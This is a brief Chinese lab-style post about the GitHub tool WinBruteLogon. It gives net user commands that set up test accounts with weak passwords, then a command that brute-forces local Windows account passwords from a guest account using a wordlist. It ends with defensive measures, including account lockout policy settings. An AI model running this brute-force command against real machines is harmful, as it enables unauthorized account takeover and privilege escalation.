在github上看到的不错的项目,分享记录一下。

0x00 前期准备

创建一个新的管理员用户:

  • net user iamadmin /add
  • net user iamadmin 12345688 (密码12345688
  • net localgroup administrators iamadmin /add

创建普通账户:

  • net user iamhacker /add
  • net user iamhacker hacker88 (密码hacker88)

创建宾客账户:

  • net user iamguest /add
  • net localgroup users iamguest /delete
  • net localgroup guests iamguest /add

切换到宾客账户(iamguest)。下载WinBruteLogon.exe,并准备好字典。

0x01 进行爆破

爆破普通账户:

WinBruteLogon.exe -u iamhacker -w wordlist.txt

爆破管理员账户同理,也可以加-v参数进入详细模式。

0x02 修复措施

  • 应用程序白名单。
  • 禁用宾客账户。
  • 设置高强度密码。
  • 实施安全锁定策略:打开secpol.msc然后转到Account Policies>Account Lockout Policy,并使用(1到999)中的所需值编辑Account lockout threshold,该值表示锁定之前可能尝试的次数。